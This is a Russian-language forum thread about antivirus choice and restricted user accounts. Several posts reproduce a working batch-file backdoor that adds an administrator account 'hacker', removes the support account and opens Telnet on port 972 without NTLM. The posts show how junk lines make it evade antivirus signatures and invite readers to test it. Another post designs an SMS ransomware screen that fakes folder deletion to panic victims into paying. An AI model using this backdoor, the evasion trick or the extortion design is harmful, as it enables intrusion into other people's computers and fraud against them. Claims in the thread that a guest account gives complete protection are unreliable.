Как вы защишаетесь от вирусов? Какой антивирус по вашему лучший? А из бесплатных? Эффективно защишаться ограничением прав (как в учетке гость) ? Они мне блокировали винду и требовали смс, ломали операционку, воровали данные, блокировали доступ к сайтам и т.д. Заклебали они меня! Хочу найти действенное средство против них. Что посоветуете?
не лазить по порносайтам. насчет смс блокеров на сайте касперского их снимают бесплатно. антивирус как мне кажется лучше касперский или нод 32
А я зделал просто, устанавил самую гавнисту винду, эта скатина неплохо работает!(лазию в инет без антивируса!)
И как говорят гавно к гавну не липнет!
vitya написал(а):
А я зделал просто, устанавил самую гавнисту винду, эта скатина неплохо работает!(лазию в инет без антивируса!)
И как говорят гавно к гавну не липнет!
грубо.
vitya написал(а):
(лазию в инет без антивируса!)
Из под учетки "админ"? Это самоубийство!
Димидиран написал(а):
не лазить по порносайтам
Мне как раз по ним лазать надо и чтоб комп не ломался!
В Ограниченной Учетной Записи блокировшик почти ничего не сделал, я спокойно переустановил учетку и всё пропало. Антивирус в учетке "админ" пропустил его и всё заблочилось. Значит Ограничение Выполнения Данных (ОВД) стопроцентно задержит вирус, в отличие от антивируса? Почему ОВД так мало пользуются?
Manticore написал(а):
vitya написал(а):
(лазию в инет без антивируса!)
Из под учетки "админ"? Это самоубийство!
Димидиран написал(а):
не лазить по порносайтам
Мне как раз по ним лазать надо и чтоб комп не ломался!
В Ограниченной Учетной Записи блокировшик почти ничего не сделал, я спокойно переустановил учетку и всё пропало. Антивирус в учетке "админ" пропустил его и всё заблочилось. Значит Ограничение Выполнения Данных (ОВД) стопроцентно задержит вирус, в отличие от антивируса? Почему ОВД так мало пользуются?
подсказал мне способ защиты от блокеров. не сидеть с учетки админа
Димидиран написал(а):
подсказал мне способ защиты от блокеров. не сидеть с учетки админа
Всё не так просто. Не в админе работает инет, фильмы, музыка. Проги нормально не работают! Принцип такой - запрещаются большинство действий. Для всех запрещаются - и для хороших, и для вредоносных программ. Надо иметь железные нервы, чтобы сидеть не из под админа.
хех.
Добавлено спустя 31 секунду:
Добавлено спустя 27 секунд:
Добавлено спустя 21 секунду:
Добавлено спустя 12 секунд:
не думал об этом
Если троян посылает команду "отключить восстановление системы", то если в антивирусе в базе данных есть такая команда, то антивирус не даст её выполнить. Если нету - то даст. Если в винде ограничить права и запретить "отключение восстановления системы", то никто никогда её не отключит. Получается, ограничение прав - 100% защита от вирусов. А антивирусы - не 100%. Почему же большинство пользуются антивирусами?
я не пользуюсь. только оперативную память жрут
я пользуюсь Avast.
Пользуйтесь лучше DR.WEb!!!!!!!
Бесит одно что на всех антивирусниках нужны обновления и ключи........
Согласен с пумой. Avast есть хорошо. Хотя самыми лучшими эликсирами от вирусов являются Пряморукин и Нелезькуданенадозин.
Есть ещё Нормоперациосистемин и Совсемненормоперациосистемин. Оба помогают. Второй лучше, под ним вирусы самостоятельно складываются в штабеля на рабочем столе и ждут отправки в лабораторию Dr.Web или ещё куда.
demos_kratos написал(а):
Нелезькуданенадозин
А если я любитель пираток?
тогда все
Тогда юзай TPB или RuTracker для поиска пираток. Там вирей не будет.
EDIT: @SFeLi Я уже почти яблочник и забыл, что такое вирусы...
По моим наблюдениям, ограничение прав и запрет выполнения команд гораздо надежнее антивируса. Почему тогда почти все пользуются антивирусами?
Manticore написал(а):
По моим наблюдениям, ограничение прав и запрет выполнения команд гораздо надежнее антивируса. Почему тогда почти все пользуются антивирусами?
Наверно потому,что не всем удобно юзать ограничения и запреты,многим невдомек,остальным попросту легче использовать антирь,чем ставить данные ограничения,да и зачем?
Антивирь запрещает выполнять то, что не надо выполнять. Но он может пропустить что-то, а ограничение прав никогда не пропустит. Что такое антивирь? Это прога, которая в нужный момент не даст выполнить вредоносный набор команд. Антивирь запрещает, и ограничение прав запрещает. Делают они одно и тоже, но антивирь может дать выполнить что-то, а ограничение никогда не даст выполнить то что не надо выполнять, и вирус это никак не обойдет! Значит ограничение - 100% зашита?
Manticore написал(а):
Значит ограничение - 100% зашита?
Чтобы 100% защитить компьютер,и быть уверенным в этом,то придется ограничить права и поставить запрет на 100% системы,т.е. это равносильно работе через безопасный режим,то то и оно-бред,если бы было все так просто,то антивирей бы не было и в помине,а вместо этого были бы одни настройки запретов и выключений=антивирь.
Обычно юзеру не нужно залезать в Администрирование. А вот вирусам очень нужно. Получается, доступ туда открыт, хотя юзеры этим пользуются крайне редко. Зачем кстати туда доступ открыт по умолчанию? Туда никто не залезает, кроме вирусов (имею ввиду почти не залезают)! Антивири позволяют туда залезать (почему они кстати позволяют? кто залез в Администрирование - сразу тревогу включать надо, это же подозрительное действие!), а ограничение прав никогда не позволит туда зайти.
Конкретный пример - я запускал блокировщика-вымогателя из под админа с авастом. Аваст ничего не заметил и не запретил, винда заблокировалась. Потом запустил из под гостя без аваста - ничего не заблокировалось, только окно повисло посреди экрана. Удалил гостя, создал новую учетку-гостя и троян изчес.
Данный эксперимент показал, что ограничения прав намного надежнее антивируса!
Люди посоветуйт мне!!!!!!!!Какой мне нужен антивирусник только не Доктор Web.......!!!!!!!из за него у меня все почти нафиг удалилось на компе!!!!!!
Говорят Nod 32 и Касперский самые мощные. Настрой себе шаблон безопасности http://www.oszone.net/4072/Security_Con ... n_Tool_Set , по-моему надежнее будет.
Еще варианты защиты - сиди в Линуксе, покупай только лицензионные программы и игры, в инет выходи всегда из под гостя, никогда не запукай пиратские программы и игры. Для них можно второй виндос поставить или на другом компе запускать для опытов.
помоему опасения излишни. это уж до смерти боятся вирусов чтоб с антивирусом да ещё и с гостя....
Как думаете, если написать такого блокировщика-вымогателя, в котором будет появляться окно виндусовое в котором написано название папки с вашего компа и написано что идет удаление (то, что появляется когда папку удаляешь обычным способом). Будет написано "Отправтье смс, тогда ваши данные не будут удалены". Например, у вас папка "мои фотки". Будет написано "удаление папки "Мои фотки"" и будет шкала слева направо заполнятся. Так вот, человек в панике отправит смс чтоб данные сохранить? Еще написать что "При выключении, перезагрузке компа данные будут уничтожены, поэтому отправьте смс немедленно".
Если человек перезагрузит комп, будет написано "Была удалена папка Мои фотки", открывается проводник и показывается что папки действительно нет.
Можно написать прогу которая будет угрожать форматнуть диск С пока не введёшь высоту Киллимонджаро в миллиметрах. Это будет позабавней.
ахаха))) во вещь то будет)
спасибо за NOD!!!)
AWP_Mega написал(а):
антивирей бы не было и в помине
Я проводил опыт. Запустил трояна в админе с антивирусом. Комп сломался. Потом я запустил трояна в госте (с ограничениями прав). Комп почти не сломался. И вы говорите что антивирус надежнее??
demos_kratos написал(а):
Avast есть хорошо
Аваст много вирусов не видит, не лечит. Лучше конечно с ним, чем вообще без антивируса, но я бы не сказал что "аваст есть хорошо".
Ты конечно монстр трояны у себя заводить на компе
Добавлено спустя 2 минуты 9 секунд:
Вообще я купил Касперского 2010 лицезию в копьютером магазине и ничто меня не беспокоит. Некоторые трояны могут спать месяцами и не губить копьютер. Может не стоит волноватся из-за каждого подозрительного файла на копьютере.
Я их не завожу, они сами приходят.
Блэцк написал(а):
и ничто меня не беспокоит
Любителей пираток, кряков и No CD беспокоит. Ты наверно только лицензионным ПО пользуешься? В инет выходишь из под админа? Каким браузером пользуешься? Иногда они через браузер проходят!
Вообще, хорошая защита - создавать при каждом запуске контрольную точку и спрашивать перед входом в виндос "Всё в порядке или сделать откат, восстановить систему?". Тогда, если вирус испортит комп, всё будет легко восстановлено. Когда увидел что комп сломался, перезапускаешься, жмёшь "Сделать откат" - и комп починен. Почему так кстати по умолчанию не делают?
Manticore написал(а):
Я их не завожу, они сами приходят.
1Меньше лазий по всяким сайтам!
2Если у тя лецензионная то снеси её нафиг и установи пиратку!(к пиратки почти ничё нелипнет, а к лецензии дофига и больше!)
3Если пиратка то отключи братмауэр и обновления так как майкрософт может при обновлении просечь твою пиратку и сама запустить фирус!
4Также установи себе на комп фаерфол, так как атака может быть из вне!
5Если тебе всё это непомогло удали антивирус фаервол и прочее и дай мне свой ip я залезу к тебе в комп и буду проводить на нём эксперементы, так как свой комп жплко!(5 пункт шутка!!!!!!!)
Как это ты залезешь через IP? Залезть можно через троян, например, замаскировав его под мультиплеер для Oni.
vitya написал(а):
1Меньше лазий по всяким сайтам!
Из под гостя можно лазать куда угодно.
Фаервол не понравился. Вирусы все равно проходят, а сайты не открываются.
В пиратках зато есть зараженные кряки и No cd.
Браузер у меня Opera. Да. Я стараюсь покупать только лицензионное ПО. Надежнее. Все равно. Создовать контрольную точку при КАЖДОМ запуске это безумство
Добавлено спустя 2 минуты 47 секунд:
Кстате откат невсегда работает...
Был у меня такой блокер...искал я музыку в интренете однажды. Ненашел и отправился играть. Минут эдак через 20 у меня начинает все гаснуть и закрываться и система перезагружается. При повторном запуске у меня вместо приветствия ЧЕРНЫЙ ЭКРАН И НА НЕМ НАПИСАНО ЧТО НУЖНО ОТПРАВИТЬ СМС. В безоп. режиме тоже самое. Пришлось формат жесткого диска делать...
Вымогатель, имея 100% права, делает в системе что угодно. Юзер очень редко пользуется всеми 100% правами админа. Вопрос - зачем в админе по умолчанию 100% права, если юзер все равно только частью пользуется? Получается, права открыты исключительно для вирусов.
Manticore написал(а):
Получается, права открыты исключительно для вирусов.
Поправка - права, которыми не пользуется юзер, открыты для любых программ , в том числе и для вирусов. Если кто-то полез в Администрирование не через окно, напрямую команды посылает (юзер только через окно заходит), значит это вирус и его сразу блокировать. Почему антивирусы так не делают?
А как они тогда делаеют?
Блэцк написал(а):
А как они тогда делаеют?
А никак! Пропускают вирус, если его нет в антивирусной базе. Ну вот зачем нормальной проге залезать в Администрирование? Нечего ей там делать!
Хм хм хм....вирусная база содержить все вирусы мира?
Не содержит. Есть ещё эвристический анализ, когда антивирус следит за подозрительными действиями. Хотелось бы подробнее узнать, что это за действия.
Да брось. Плохого точно антивирус не сделает
Manticore, а что же такое проактивная защита тогда?.. 
Блэцк написал(а):
Да брось. Плохого точно антивирус не сделает
Ложные срабатывания - не есть гуд. Из-за них некоторые юзеры удаляют важные и нужные файлы, которые на самом деле не заражены.
Яркий пример. Взял я настоящий троян. Касперский, Аваст, Dr web , NOD писали "Заражен". Изменил я в названии файла 1 букву. И стали они писать "Не заражен". И проактивная защита ничего не заметила.
В январе 2010 был всплеск активации вымогателя, миллионы компов заблокированы. Все антивирусы молчали, проактивная защита не помогла! Если б не сидели со 100% правами админа, а хотя бы с 80%, комп бы не заблокировался. Или частично бы сломался.
"Сидеть не со 100% правами админа" надежно защищает от блокировщиков, шпионов и прочей ереси. От переименовавния, удаления, перемещения файлов не защищает. Но вирусы редко этим занимаются, у них есть дела поинтереснее.
Если я правильно понимаю, при отключенных "Назначенных заданиях" вирус никогда не проснется 1 апреля, соответственно те вирусы, которые при запуске не сразу ломают комп, так и будут спать.
А вирус, который сразу активируется при нажатии на "exe", сразу проявит себя, и используя контрольную точку (при каждом запуске необязательно создавать, можно раз в день создавать) делаем откат всего лишь на один день.
Блэцк написал(а):
Да брось. Плохого точно антивирус не сделает
Ничего не сделает?????????
Да у меня DrWEB без моего разрешения все практически удалил...
В шоке тогда был...
Nod32 неплохой...все времявирусы находит и лечит......некоторые удаляет...которые не в состояние излечится....
Надо не удалять, а в карантин! У тебя наверно по умолчания стояло "удалять файлы". Кстати, файлы физически не удаляются, там ставится метка "сюда можно записать новое". Чтоб физически уничтожить информацию, надо записать в файл новую инфу, которая сотрет старую.
Не знаю не знаю...Касперский 2010 лицензия из магазина ничего без спросу не удаляет...может рискну предположить что это так себя ведут НЕ лицензионные программы?
Ну вот к примеру скаченная Lineage2 не с офф. сайта а со стороннего ресурса может принести взлом аккаунта последствием того что в клиент был вмонтирован перехватчик паролей. Может и с не лицензионным антивуросом так? Делает вид что удаляет троян а на самом деле...
Блэцк - Сейчас твои доводы очень сильно напоминают доводы законопослушного среднестатистического американца. Пираты так не подставляют, знаешь ли. Если, конечно, знать, где брать. ^_^' Ручаться на 100% можно за RuTracker, ThePirateBay и Demonoid + еще пара приватных трекеров.
Кстате о rutracker. Что с ним? Раньше там было все а теперь вообще удалили все...
Блэцк написал(а):
Раньше там было все а теперь вообще удалили все...
Смотря что ты имеешь ввиду под "всё".
Игры например. Л2 такая раздача прекрасная была...
Кто пробовал сидеть в учетке "Опытный пользователь"? Поделитесь впечатлениями!
В какой ОС? ХР?
Запустил учетку "Опытный пользователь", там доступ к службам открыт! Зачем? Это же админские дела!
Если в проге (зараженной игре) написаны такие команды:
1. Создать ярлык для игры
2. Включить Telnet чтобы злооумышленник управлял компом жертвы
3. Установить текстуры, модели в папки для игры
4. Отключить службу Брандмаузер
5. Установить движок игры
6. Открыть удаленный рабочий стол
7. Установить в Пуск строчки для игры
8. Отключить службу восстановения системы
9. Установить звуки игры
И т.д.
Нечетные цифры - полезные команды. Четные - вредоносные. Игру устанавливают не в админе, на четные команды нет прав. Антивирус выключен. Что будет делать установщик? Выполнит только нечетные цифры, или остановиться на второй команде? Если остановиться, пропустить никак нельзя?
Вирусов не избежать! И с этим надо смирится
- В инет выходить только из под гостя и тогда можно лазать куда угодно и тыкать во всё подряд
- Использовать только лицензионные проги. Никогда не запускать пиратку!!!
Вирусов не будет!
Есть другой вариант: своевременно обновлять ось, браузер, флешплееры с явой и акробатридеры не ставить PDF-плагин для браузера. Ну или наоборот не обновлять десяток лет. Не лазить куда угодно ? всё равно где угодно ничего хорошего нет. Софт брать с офсайтов, софт, которого нет на офсайтах брать с популярных раздач на известных торрент-трекерах. И не делать проблему из ничего.
Sfeli написал(а):
Не лазить куда угодно ? всё равно где угодно ничего хорошего нет.
В госте разрешено только Чтение и Выполнение в RAM. Попортить могут только "Мои документы" (поставить пароль и тогда не попортят), но вирусы этим не занимаются. Почему не лазить куда угодно? Гость для того и существует, чтоб в нём тыкать во всё подряд.
Sfeli написал(а):
брать с популярных раздач на известных торрент-трекерах
Если популярный и известный - значит не заражен? С чего вы взяли?
В госте сидеть неудобно (а программисту чертовски неудобно!), и это мало защищает от эксплойтов и троянов (выполнился через багу в браузере, скачал прямо в память нагрузку, которая отправила дяде всякие пароли на вконтакты, и вуаля ? твои друзья получили гору спама).
Популярный и известный ? значит несколько сотен человек, у многих из которых есть антивирусы, скачали и не заметили ничего подозрительного. А стопроцентной гарантии никто не даст. Вон, может твой скайп следит за тобой, как проверишь?
Manticore написал(а):
Если популярный и известный - значит не заражен? С чего вы взяли?
Трэкер: Известный - значит модераторы обращают внимание на жалобы. Раз обращают внимание на жалобы, значит прикрывают подозрительные раздачи.
Раздача: Популярная - значит не прикрыли. Раз не прикрыли, значит жалоб не поступало. Жалоб нет - значит вирей нет. Или ты думаешь все 600 и более человек, скачавших <что-либо>, слепые и не заметили вируса?
Ведь элементарно же, Ватсон?
Добавлено
Оппаньки, многоликий дубльпост...
demos_kratos написал(а):
Или ты думаешь все 600 и более человек, скачавших <что-либо>, слепые и не заметили вируса?
Я сейчас провел эксперимент. Взял bat троянчика, проверил антивирусами - написали "Заражен". Написал я в конце bat файла на новой строчке аброкадабру. Все антивирусы написали "Не заражен". Запустил я троянчик с аброкадаброй в админе. Он сделал все свои грязные дела, обойдя антивирусы! Таким образом троянчик может обмануть всех 600 и более человек!
В трекере скорость низкая, а в локалке -высокая!
С ограниченными правами троянчик ничего не сломал!
Пароли надо держать в запароленном rar архиве, а не в открытую!!
Manticore написал(а):
Если популярный и известный - значит не заражен? С чего вы взяли?
Ну это уже странно. У тебя боязень вирусов? На хорошем торренте раздачи с вирусами закрывают
Вирус могут не найти, особенно если новый, и активироваться он может через 2 недели после запуска игры. Выложили игру, вроде не зараженная, а потом через 2 недели хоп - и компы сломались. И непонятно где заразился.
Вот троян, тело bat файла:
chcp 1251
net user SUPPORT_388945a0 /delete
net user hacker hack /add
net localgroup Администраторы hacker /add
net localgroup Пользователи SUPPORT_388945a0 /del
regedit /s conf.reg
sc config tlntsvr start= auto
tlntadmn config port=972 sec=-NTLM
net start Telnet
Антивирусы сразу кричат что опасен
Теперь напишем так
chcp 1251
net user SUPPORT_388945a0 /delete
net user hacker hack /add
net localgroup Администраторы hacker /add
net localgroup Пользователи SUPPORT_388945a0 /del
regedit /s conf.reg
sc config tlntsvr start= auto
tlntadmn config port=972 sec=-NTLM
net start Telnet
sdbhubvgsrhbghs
Троян остался таким же работоспосбным и опасным, но из-за "sdbhubvgsrhbghs" антивирусы пишут "Не заражен" и никак не блокируют угрозу! Вот так на раздаче можно обмануть антивирусы!
P.S. Если надумаете его попробовать, удалите жало
net user SUPPORT_388945a0 /delete
net localgroup Пользователи SUPPORT_388945a0 /del
Да тебе надо в лабораторию Касперского идти работать...
Блэцк, ты говорил у тебя Касперский? Проверь в госте, обманет ли его "sdbhubvgsrhbghs" ?
Не буду рисковать. Машина новая.
Manticore написал(а):
антивирусы пишут "Не заражен"
Блэцк, bat файл не надо создавать. Создаешь txt (это неисполняемое расширение), кидаешь туда первый вариант и сканируешь. Потом добавляешь "sdbhubvgsrhbghs" в конце и сканируешь.
Мih@ написал(а):
ЧЯДНТ?
Вы в конце добавили "sdbhubvgsrhbghs"? Можно команды местами поменять, в середине что-то добавить. Вообщем, модифицировать файл.
Ну и что? Молчит мой антивирус без "sdbhubvgsrhbghs" . И с "sdbhubvgsrhbghs" молчит
Manticore написал(а):
Вы в конце добавили "sdbhubvgsrhbghs"?
а по длине файла незаметно?$ md5sum file.bat && cat file.bat
7f552f2182f20b55aa42f5db9e7e5894 file.bat
chcp 1251
net user SUPPORT_388945a0 /delete
net user hacker hack /add
net localgroup Администраторы hacker /add
net localgroup Пользователи SUPPORT_388945a0 /del
regedit /s conf.reg
sc config tlntsvr start= auto
tlntadmn config port=972 sec=-NTLM
net start Telnet
sdbhubvgsrhbghs
Manticore написал(а):
Вообщем, модифицировать файл.
ну покажи, как. :3
Мой Аваст не молчит. Ты нажал "сканировать файл"? Значит его нет в антивирусной базе Касперского 
. Аваст выиграл 
.
Бред какой-то очередной. ВОТ КАК txt может нести угрозу если он не исполняемый?
В txt я сказал переименовать, чтоб он тебе ничено не попортил. Он легко может стать bat файлом, и тогда будет опасен. На txt аваст пишет "Обнаружена угроза".
Антивирус запрещает выполнять действия. И ограничения прав тоже запрещают. В чем разница? Оба запрещают.
Мант, ты, как вирусофоб, просто обязан перейти на линукс. =3
Ну если что-то серьезное будет то я возьму диск на котором написано "Windows7" и переустановлю ОС с форматом жесткого диска
Добавлено спустя 54 секунды:
О да. Линукс тоже выход
Зачем в винде есть команда net user SUPPORT_388945a0 /delete и net localgroup Пользователи SUPPORT_388945a0 /del , которая удаляет стандартную админскую учетку? Чтоб юзер контроль потерял над компом? Какая от этого польза?
demos_kratos написал(а):
Мант, ты, как вирусофоб, просто обязан перейти на линукс. =3
судя по обсуждению работы с админскими правами и bat-вирусов, дело будет длиться до первого перлового однострочника. %)
Manticore написал(а):
Зачем в винде есть команда net user SUPPORT_388945a0 /delete и net localgroup Пользователи SUPPORT_388945a0 /del , которая удаляет стандартную админскую учетку? Чтоб юзер контроль потерял над компом? Какая от этого польза?
Наверно надо если есть
Мih@ написал(а):
дело будет длиться до первого перлового однострочника.
Так это не вирус. Это патч =3
demos_kratos написал(а):
Так это не вирус. Это патч =3
ну вот вышеупомянутый батник, который рассматривали, тоже был патчем, выпиливающим суперпользовательскую учётку, чтоб неповадно было. +)
Это троян, а не патч. Вирусом вы его назвали, а не я!
Если человек на компе только лазит в инете, смотрит кино, слушает музыку, читает тексты и т.д. - гость для него лучшая защита. А таких большинство.
Мih@ написал(а):
выпиливающим суперпользовательскую учётку
Его цель - открыть доступ к чужому компу!
Если батник сделать так
chcp 1251
s
net user SUPPORT_388945a0 /delete
s
net user hacker hack /add
s
net localgroup Администраторы hacker /add
s
net localgroup Пользователи SUPPORT_388945a0 /del
s
regedit /s conf.reg
sc config tlntsvr start= auto
tlntadmn config port=972 sec=-NTLM
net start Telnet
то антивирусы угрозы в нём не видят!!! А троян при этом такой же работоспособный и опасный! Антивирусную базу очень легко обмануть. Может проактивная зашита троян остановит, но я сомневаюсь. Представьте , что троян весит не 200 байт, а 200 килобайт и замаскирован под что нибудь безобидное. А уж спрятать его в 4 гигабайтную игру очень легко. Или в 3 мегабайтный no cd.
Вы после этого всё равно уверены, что на трекере безопасно? Там кстати скорость низкая, качать долго. А в локалке быстро.
Manticore написал(а):
то антивирусы угрозы в нём не видят!!!
а касперский классифицирует такой батник как Backdoor.BAT.Teldoor.m, ЧЯДНТ? :3
Классифицирует, если троян без "s".
Manticore написал(а):
Классифицирует, если троян без "s".
cat file.bat написал(а):
chcp 1251
s
net user SUPPORT_388945a0 /delete
s
net user hacker hack /add
s
net localgroup Администраторы hacker /add
s
net localgroup Пользователи SUPPORT_388945a0 /del
s
regedit /s conf.reg
sc config tlntsvr start= auto
tlntadmn config port=972 sec=-NTLM
net start Telnet
ЧЯДНТ?
Мih@ написал(а):
ЧЯДНТ?
У вас троян с "s". Надо без "s", как в "Backdoor1.txt". Кстати, Касперкий написал что "неисполняемый формат txt опасен"! Он так не написал открыто, но вы видите строчку "Проверенный файл - Backdoor1.txt - инфицирован".
каспер нод аваст..оцтой ИМХО AVG лучше...
всеми антивирусами пользовался АВГ есдинственный большинство вирусов находит..и комп не тормозит и систему не сносит....стабильный надежный антивирус...
AJIuCaRD написал(а):
АВГ есдинственный большинство вирусов находит
А ты уверен, что это не ложные обнаружения? И когда он пишет "заражен", почему/на каком основании ты веришь антивирусу? Может он просто так это написал?
В том батнике вставь "s" и посмотри, облажается AVG или нет?
Не NOD32 лучше...вот он у меня вирусы каждый раз находит!!!
Sockol@ написал(а):
NOD32
"s" NOD32 тоже обманул!
Manticore написал(а):
Sockol@ написал(а):
NOD32
"s" NOD32 тоже обманул!
КАК????ДОКАЖИ!!!!!!!!!!!!!!
Sockol@ написал(а):
КАК????ДОКАЖИ!!!!!!!!!!!!!!
Как-как. По сигнатуре не совпадает, поэтому NOD32 пишет "не заражен".
У тебя есть NOD32? Создай троян с "s" и посмотри реакцию NOD32. На virustotal троян закинь. Там 30 антивирусов, никто угрозы не увидит. Может потому что троян без жала? С жалом я тоже пробовал, не видят угрозы.
Ща за пивком сбегаю, потом докажу.
Антивирус обманывать очень просто, но они как бы защищают от распространённых известных вирусов, которые нацелены на массовое заражение. Пока в операционной системе можно исполнять недоверенные программы с повышенными правами, от вируса защититься не получится.
"Проактивная" защита это ужасный костыль для ненадёжных ОС и беспомощных администраторов.
Вывод - антивирус - не лучшая защита! Касперский или AVG - не важно.
Manticore, доступ открыть и из-под гостя можно. И не только батником. И не только через службу телнета. Вот эта фигня, например, работает под гостем (даёт, сколько есть доступа у гостя ? достаточно, чтобы получить больше) и на протяжении лет пяти почти сканерами не детектилась (сейчас 6/40 и проактивкой везде почти): http://boooooo.pastebin.com/nWQczWnF (компилировать не буду, а в коде баг во избежание ;-)) Я иногда пользуюсь Анубисом против такого (но это не антивирус). Ну и файрвол спасает, хоть и обходится тоже.
Грамотно расставленные разрешения тебя от многого спасут, но ты убьёшься их расставлять. И не факт, что однажды ты сам не запустишь какую-нибудь гадость под админом. Гораздо проще сразу думать, откуда и что ты качаешь. И не ползать по левым варезятникам и порносайтам, да.
Sfeli написал(а):
Вот эта фигня, например, работает под гостем
Каким образом? Там же почти всё запрещено! Службы перекрыты, изменения файлов тоже.
Блин. Программы запускать можно? В интернет можно? Этого достаточно.
Но вообще, этому уже много лет, и я могу ошибаться вполне) Скопипастил из архива)
Запуск (чтение), изменение (в RAM) и запись (в HDD) - разные вещи! В госте в основном чтение. В инете всё крутится в браузере и редко вылезает наружу.
Sfeli, я вчера литр винца выпил, поэтому не то написал! Исправлю!
Sfeli написал(а):
Программы запускать можно?
Можно. Запись в HDD запрещена (кроме Мои документы). Если что-то и испортят, то в RAM, после перезагрузки всё восстановится. Можно переустановить учетку и всё починится. Это быстро и легко.
Sfeli написал(а):
В интернет можно?
Большинство программ работают в браузере, через браузер редко в винду что либо проходит. Если и пройдет, ограничение прав убьёт вирус. Если браузер сломается, перезапускаешь/переустанавливаешь его - и всё.
Если я отключил все службы, позволяющие удаленно смотреть мой комп и запретил их запуск, то как меня прошпионят?
Каспеерский рулит! Копите нормальные компы и система виснуть не будет! И ИМХО свое засунте куда подальше!
о, кстати, пока не забыл. Блэцк, ты ведь хочешь в бан? или только недавно захотел? :3
Блэцк написал(а):
Молчит мой антивирус без "sdbhubvgsrhbghs" . И с "sdbhubvgsrhbghs" молчит
Блэцк написал(а):
Каспеерский рулит!
Как же он рулит, если тот Backdoor не видит? Плюс я читал жалобы о том, как Касперыч пропускает блокировщиков!
Проверил я тот батник в пробной версии Касперского - проактивная защита молчит, троян установился без помех! Может потому что пробная версия?
Для меня хорошие антивирусы это Касперский и NOD32. Когда-то давно стоял DoctorWeb, но потом я его поменял. Говорят есть какая-то Cobra, но я её никогда не укого не видел. А если хотите избавиться от ощущения преследования "агентами 007" имейте два компа, один слабенький (ноутбук) для инета, где стоят антивирусы и всё обновляется по последнему слову техники, другой "игровой" там где вся остальная важная "только вам" информация. И естественно никогда и не при каких условиях не подключайте его к "Мастер Контролю". Вот так.
Oxenkiller написал(а):
Для меня хорошие антивирусы это Касперский и NOD32
Тот троян их обходит. Значит они не хорошие. То есть если тебе такой троян попадётся, Касперский и Нод ничего не скажут, а комп сломается!
Касперыч написал бы "прога хочет создать новую админскую учетку, выпилить вашу и разрешить удаленному пользователю запускать и менять проги на вашем компе. Это очень подозрительные действия, я уверен что они вам не нужны и я настоятельно рекомендую отправить прогу в карантин". Касперыч ничего не пишет, а ведь троян в его базе записан!
Зацените! Убивает троян, который заблокировал сайты.
Если антивирус, проверив все выполенные процессы, обнаружит что данные процессы есть в антивирусной базе конкретного вируса, он может отменить эти действия? Это была бы хорошая защита от модифицированных вирусов. Почему её не используют?
Если в avi, mp3 спрятать вирус, а потом кто-то переименут avi в exe, то таким образом легко обмануть антивирус?
demos_kratos написал(а):
Жалоб нет - значит вирей нет
А если вирь активируется через неделю после запуска игры?
AWP_Mega написал(а):
Наверно потому,что не всем удобно юзать ограничения и запреты
Антивирус тоже запрещает и ограничивает. В чём тогда разница?
Manticore написал(а):
Если в avi, mp3 спрятать вирус, а потом кто-то переименут avi в exe, то таким образом легко обмануть антивирус?
Нет. Аваст к примеру как только ты заходишь в папку с файлом, он начинает проверять даже txt на наличие ништяков.
Manticore написал(а):
А если вирь активируется через неделю после запуска игры?
И что? Чей-то антивирь все-равно найдет что-нибудь. И раздачу прикроют. На таких трекерах, как RuTracker или TPB жить мешают только правообладатели. Там вирусных раздач поочти нет.
А как они узнают, откуда вирус пришел? За эту неделю они у себя кучу прог запустят, и в какой был вирус - понять сложно.
Значит не повезло.
Я придумал лучшую защиту от вирусов!
1. Всю конфидицеальную инфу хранить только на съёмных носителях.
2. Разделить комп на 2 операционки - в одной только лицензионное ПО в которой нет вирусов, в другой - нелицензионное (не ставить туда аську, почту и т.д.).
3. Аську, почту и им подобные хранить в отдельной операционке/учетке. Запускать там только это. Тогда шпионам там взяться неоткуда.
4. В инет выходить в учетке, в которой все запрещено, кроме лазания по инету. Тогда, если через дыру в браузере что-то и пройдет, системе не навредит.
5. Создавать контрольные точки раз в неделю. Тогда откат будет малоболезненным. При активации вируса сломается не весь комп, а только его часть.
6. При активации вируса "работа" не пострадает, только развлечения. Но они не такие ценные, как "работа".
Manticore Посмотри мой пост в этой же теме за # 105
offtop: Зачем такой геморрой, я уже писал гораздо проще иметь два компьютера. Сейчас это почти каждому по карману. Один "игровой" и некогда неподсоединённый к сети 
, другой чисто для инета (например ноутбук) и проблемм нет. 
Oxenkiller написал(а):
"игровой" и некогда неподсоединённый к сети
Игры лицензионные только? Щас игры требуют выход в инет для регистрации и запуска. По сетке гамать - инет. Если пиратские - значит кряки нужны, а там блокировщики и всё остальное.
Oxenkiller написал(а):
другой чисто для инета
А проги где запускать? Они ведь из инета берутся, а там может быть что угодно.
Get a Mac!
А если серьезно, то мант, ты либо тролль, либо параноик. Защити себя от всех болезней - залезь в презерватив и не вылезай оттуда. И ешь другим ртом. И не дыши. Мало ли что-то внутрь презерватива забралось пока ты его надевал. А хотя некоторые вирусы спокойно проходят через презерватив, так что для пущей уверенности построй вокруг себя свинцово-бетонный склеп. Тогда даже радиация не возымеет тебя.
demos_kratos написал(а):
Защити себя от всех болезней - залезь в презерватив и не вылезай оттуда. И ешь другим ртом. И не дыши. Мало ли что-то внутрь презерватива забралось пока ты его надевал. А хотя некоторые вирусы спокойно проходят через презерватив, так что для пущей уверенности построй вокруг себя свинцово-бетонный склеп. Тогда даже радиация не возымеет тебя.
Сейчас demos_kratos иронизировал, но никто ему не говорит что он бредит. Почему когда я иронизирую, мне говорят, что я несу бред?
Лучшая защита - запретить прописывание в автозагрузку. Тогда вирус будет умирать при перезапуске.
Oxenkiller, ты сказал что лучшая защита это иметь 2 компа. На одном игры, на другом инет. Ты имел ввиду на одном развлечения, на другом работа? Давай посмотрим. Игры есть лицензионные и пиратские. Проги для развлечений тоже. Нельзя гарантировать что нет вирусов. Значит комп может быть поломан, в ноу сиди любят прятать вредителей.
Комп для инета. Как раз инет-основной источник вирусов. Опять низкая защита. А ты говорил что проблем нет. В твоем варианте нет никакой защиты!
Ну где-е-е? где ты берёшь такую траву кряки с вирусами? Вирусы отдельно я ещё могу понять? но кряки?
Я не говорю что во всех кряках вирусы. Иногда попадаются. В прогах скачанных из инета, тоже. Вот это "иногда" может нанести очень серьезный урон. Сегодня любят в кряках и прогах прятать вирусы, так как народ клюет на халяву.
Manticore, если уж так боязно - ну заведите на компе виртуальную машину и ставьте весь "непроверенный" софт на неё. Наружу не вылезет.) Опять же, проверка скачанных файлов антивирем - дело хорошее.)
